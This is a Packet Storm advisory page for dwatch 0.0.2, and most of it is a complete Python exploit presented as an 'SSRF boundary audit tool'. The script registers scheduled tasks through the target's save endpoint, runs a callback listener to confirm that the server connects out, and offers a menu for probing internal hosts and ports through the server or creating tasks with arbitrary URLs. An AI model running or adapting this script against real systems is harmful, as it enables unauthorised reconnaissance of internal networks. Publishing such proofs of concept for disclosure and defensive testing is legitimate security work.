PACKETSTORM

📄 dwatch 0.0.2 SSRF Boundary and Network Isolation Audit Tool_PACKETSTORM:222328

Description

This is an auditing tool to analyze server-side request forgery vulnerabilities in dwatch version 0.0.2...
Visit Original Source

Basic Information

ID PACKETSTORM:222328
Published Jun 1, 2026 at 00:00

Affected Product

Affected Versions ==================================================================================================================================
| # Title : dwatch 0.0.2 SSRF Boundary and Network Isolation Audit Tool |
| # Author : indoushka |
| # Tested on : Windows 11 Fr (Pro) / browser : Mozilla Firefox 147.0.4 (64-bit) |
| # Vendor : https://github.com/dhjz/dwatch/ |
==================================================================================================================================

[+] Summary : A security utility for testing network boundary enforcement and detecting potential Server-Side Request Forgery (SSRF) behavior in systems resembling a hypothetical dwatch environment.

[+] POC :

#!/usr/bin/env python3


import re
import csv
import json
import time
import socket
import logging
import threading
import argparse
import urllib3
from pathlib import Path
from datetime import datetime
from typing import Dict, List, Optional, Tuple
from urllib.parse import urlparse, urljoin
import requests

# Suppress urllib3's InsecureRequestWarning for the whole process.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# Root logging setup: INFO and above, timestamped, with the level in brackets.
logging.basicConfig(
    format='%(asctime)s - [%(levelname)s] - %(message)s',
    level=logging.INFO,
)

# Shared logger used by every class and function in this script.
logger = logging.getLogger("DWatchAuditor")


class DWatchAuditorCore:
    """Main engine: manages the connection to the dwatch server and checks network restrictions.

    The auditor registers scheduled tasks on the target through its
    ``api/task/save`` endpoint and, for the boundary check, runs a short-lived
    local TCP listener to observe whether the target connects back.

    Attributes are plain instance state:
      * ``base_url`` / ``save_endpoint`` -- normalised target URL and task endpoint.
      * ``created_tasks`` -- dicts (name, url, spec) of tasks accepted by the target.
      * ``callback_event`` -- set when an inbound connection was recorded; also
        used to tell the listener thread to stop.
      * ``callback_data`` -- recorded inbound connections, guarded by ``lock``.
    """

    def __init__(self, target: str, callback_host: Optional[str] = None,
                 callback_port: int = 8888, verbose: bool = False):
        """Validate the target and prepare the HTTP session.

        Args:
            target: Target URL; ``http://`` is assumed when no scheme is given.
            callback_host: Address the target should call back to. When falsy,
                the local outbound IP is detected on first use.
            callback_port: Local TCP port for the callback listener (1-65535).
            verbose: Log each submitted payload when true.

        Raises:
            ValueError: If the target has no host, uses a scheme other than
                http/https, or the callback port is out of range.
        """
        parsed = urlparse(target if "://" in target else f"http://{target}")
        if not parsed.netloc:
            raise ValueError(f"Invalid target URL structure: {target}")
        # The requests session only speaks HTTP(S); fail early with a clear
        # message instead of a transport error on the first request.
        if parsed.scheme not in ("http", "https"):
            raise ValueError(f"Unsupported target URL scheme: {parsed.scheme}")
        if not 0 < callback_port < 65536:
            raise ValueError(f"Invalid callback port: {callback_port}")

        self.base_url = f"{parsed.scheme}://{parsed.netloc}{parsed.path}".rstrip("/")

        self.callback_host = callback_host
        self.callback_port = callback_port
        self.verbose = verbose

        self.session = requests.Session()
        self.session.headers.update({
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) BoundaryAuditor/1.0',
            'Content-Type': 'application/json'
        })

        self.save_endpoint = urljoin(self.base_url + "/", "api/task/save")
        self.created_tasks: List[Dict] = []

        self.callback_event = threading.Event()
        self.callback_data: List[Dict] = []
        self.lock = threading.Lock()

    def _get_local_ip(self) -> str:
        """Return the local IPv4 address used for outbound traffic.

        Connects a UDP socket towards 8.8.8.8 and reads back the local socket
        address. Falls back to ``127.0.0.1`` on any error.
        """
        try:
            with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
                s.connect(("8.8.8.8", 80))
                return s.getsockname()[0]
        except Exception:
            return "127.0.0.1"

    def create_audit_task(self, name: str, payload_url: str, spec: str = "*/5 * * * * *") -> bool:
        """POST a task definition to the target's save endpoint.

        Args:
            name: Task name.
            payload_url: URL the task should request.
            spec: Schedule expression sent as the ``spec`` field.

        Returns:
            True when the server answers HTTP 200 with a non-empty body (the
            task is then appended to ``created_tasks``); False on any other
            response or on a ``requests`` transport error.
        """
        payload = {"name": name, "url": payload_url, "spec": spec}

        try:
            if self.verbose:
                logger.info(f"Submitting audit payload: {name} -> {payload_url}")

            response = self.session.post(self.save_endpoint, json=payload, timeout=10)
        except requests.RequestException as e:
            logger.error(f"Network transport error during task creation: {e}")
            return False

        if response.status_code == 200 and response.text:
            logger.info(f"Audit task '{name}' registered successfully.")
            self.created_tasks.append({'name': name, 'url': payload_url, 'spec': spec})
            return True

        logger.error(f"Failed to create task. HTTP Status: {response.status_code}")
        return False

    def verify_boundary_leak(self) -> bool:
        """Register a callback task and wait for the target to connect back.

        Starts the local listener thread, submits a task pointing at it and
        waits up to 12 seconds for an inbound connection.

        Returns:
            True if an inbound connection was recorded, False if the task
            could not be created or nothing arrived in time.
        """
        if not self.callback_host:
            self.callback_host = self._get_local_ip()

        timestamp = datetime.now().strftime("%Y%m%d_%H%M%S")
        callback_url = f"http://{self.callback_host}:{self.callback_port}/ssrf_token_{timestamp}"

        logger.info(f"Callback URL: {callback_url}")
        self.callback_event.clear()

        server_thread = threading.Thread(target=self._run_callback_socket, daemon=True)
        server_thread.start()

        try:
            # Give the listener a moment to bind before the target is told to call it.
            time.sleep(0.5)

            task_name = f"Boundary_Audit_{timestamp}"
            if not self.create_audit_task(task_name, callback_url, spec="* * * * * *"):
                return False

            logger.info("Waiting for inbound connection (timeout 12s)...")
            if self.callback_event.wait(timeout=12):
                logger.critical("SSRF outbound boundary breach confirmed!")
                return True

            logger.warning("No inbound request captured.")
            return False
        finally:
            # Always stop the listener -- including when task creation failed --
            # so the thread exits and the port is released for the next run.
            self.callback_event.set()
            server_thread.join(timeout=2)

    def _run_callback_socket(self):
        """Listen on ``callback_port`` until ``callback_event`` is set.

        Runs in a background thread. The accept call uses a short timeout so
        the loop re-checks the event roughly once per second. Any error is
        logged; the listening socket is always closed on exit.
        """
        try:
            with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as server_socket:
                server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
                server_socket.bind(("0.0.0.0", self.callback_port))
                server_socket.listen(1)
                server_socket.settimeout(1.0)

                while not self.callback_event.is_set():
                    try:
                        client, addr = server_socket.accept()
                    except socket.timeout:
                        continue
                    self._handle_callback_client(client, addr)
        except Exception as e:
            logger.error(f"Callback listener error: {e}")

    def _handle_callback_client(self, client, addr):
        """Record one inbound connection, signal the waiter and answer 200."""
        with client:
            # Bound the read so a peer that connects but never sends cannot
            # hang the listener thread.
            client.settimeout(3)
            try:
                raw_request = client.recv(2048).decode("utf-8", errors="ignore")
            except OSError:
                raw_request = ""

            with self.lock:
                self.callback_data.append({"sender": addr, "raw": raw_request})

            # Signal only after the data is stored so the waiting thread
            # never sees the event without the matching record.
            self.callback_event.set()
            logger.info(f"Inbound connection from {addr[0]}:{addr[1]}")

            client.sendall(
                b"HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 0\r\n\r\n"
            )

    def check_internal_service(self, host: str, port: int) -> Dict:
        """Submit a task whose URL is ``http://host:port/`` and report acceptance.

        Returns:
            A dict with ``port``, ``task_accepted`` (result of
            ``create_audit_task``) and a human-readable ``inference`` string.
            Acceptance only means the task was registered; it says nothing
            about whether the service answered.
        """
        url = f"http://{host}:{port}/"
        task_name = f"service_recon_{port}_{int(time.time())}"

        success = self.create_audit_task(task_name, url, spec="*/5 * * * * *")

        return {
            "port": port,
            "task_accepted": success,
            "inference": (
                "Task submitted - requires log verification"
                if success else "Blocked or unreachable endpoint"
            )
        }


class InteractiveConsoleInterface:
    """User interface: a text menu that drives an auditor object.

    The auditor must provide ``verify_boundary_leak()``,
    ``check_internal_service(host, port)``, ``create_audit_task(name, url)``
    and a ``created_tasks`` list.
    """

    def __init__(self, auditor: "DWatchAuditorCore"):
        self.auditor = auditor

    def display_menu(self):
        """Run the menu loop until the user picks Exit or input ends.

        End of input (EOF) or Ctrl-C at any prompt leaves the menu quietly
        instead of propagating as an error.
        """
        try:
            while True:
                print("\n" + "=" * 50)
                print("dwatch SSRF Boundary Auditor")
                print("=" * 50)
                print("1. Run SSRF Test")
                print("2. Check Internal Port")
                print("3. Create Task")
                print("4. View Tasks")
                print("5. Exit")

                choice = input("> ").strip()

                if choice == "1":
                    self.auditor.verify_boundary_leak()

                elif choice == "2":
                    host = input("Host: ").strip() or "127.0.0.1"
                    try:
                        port = int(input("Port: ").strip())
                    except ValueError:
                        print("Invalid port")
                        continue
                    # Reject values that cannot be a TCP port before they
                    # end up in a task URL.
                    if not 0 < port < 65536:
                        print("Invalid port")
                        continue

                    print(json.dumps(self.auditor.check_internal_service(host, port), indent=2))

                elif choice == "3":
                    name = input("Task name: ").strip()
                    url = input("URL: ").strip()
                    if not name or not url:
                        print("Task name and URL are required")
                        continue
                    self.auditor.create_audit_task(name, url)

                elif choice == "4":
                    print(json.dumps(self.auditor.created_tasks, indent=2))

                elif choice == "5":
                    break

                else:
                    print("Unknown option")
        except (EOFError, KeyboardInterrupt):
            # Finish the prompt line so the shell prompt starts cleanly.
            print()


def _parse_callback(value: str, default_port: int = 8888) -> Tuple[Optional[str], int]:
    """Split a ``HOST[:PORT]`` callback argument into (host, port).

    An empty host (e.g. ``:9000``) yields ``None`` so the caller can fall back
    to auto-detection. Raises ValueError for a URL, a non-numeric or empty
    port, or a port outside 1-65535.
    """
    host, sep, port_text = value.rpartition(":")
    if not sep:
        # No colon at all: the whole value is the host.
        host, port = value, default_port
    else:
        try:
            port = int(port_text)
        except ValueError:
            raise ValueError(f"invalid callback port: {port_text!r}") from None
        if not 0 < port < 65536:
            raise ValueError(f"callback port out of range: {port}")

    if "/" in host:
        raise ValueError("callback must be HOST[:PORT], not a URL")

    return (host or None), port


def main():
    """Command-line entry point.

    Parses ``-t/--target`` (required), ``-c/--callback`` (``HOST[:PORT]``),
    ``-i/--interactive`` and ``-v/--verbose``, then either opens the
    interactive menu or runs a single boundary check. A malformed callback
    value ends the program through ``parser.error``; any other exception
    while running is logged as fatal.
    """
    parser = argparse.ArgumentParser()
    parser.add_argument("-t", "--target", required=True)
    parser.add_argument("-c", "--callback")
    parser.add_argument("-i", "--interactive", action="store_true")
    parser.add_argument("-v", "--verbose", action="store_true")
    args = parser.parse_args()

    callback_host = None
    callback_port = 8888

    if args.callback:
        try:
            callback_host, callback_port = _parse_callback(args.callback, callback_port)
        except ValueError as e:
            # Report bad user input as a usage error rather than a traceback.
            parser.error(str(e))

    try:
        auditor = DWatchAuditorCore(
            target=args.target,
            callback_host=callback_host,
            callback_port=callback_port,
            verbose=args.verbose
        )

        if args.interactive:
            InteractiveConsoleInterface(auditor).display_menu()
        else:
            logger.info("Running SSRF boundary check...")
            auditor.verify_boundary_leak()

    except Exception as e:
        logger.critical(f"Fatal error: {e}")


# Run the command-line entry point only when executed as a script,
# not when the module is imported.
if __name__ == "__main__":
    main()

Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================

💭 Join the Security Discussion

🔒 Your email address will not be published. Required fields are marked *

⚠️ Please be respectful and constructive in your comments. Security discussions should remain professional.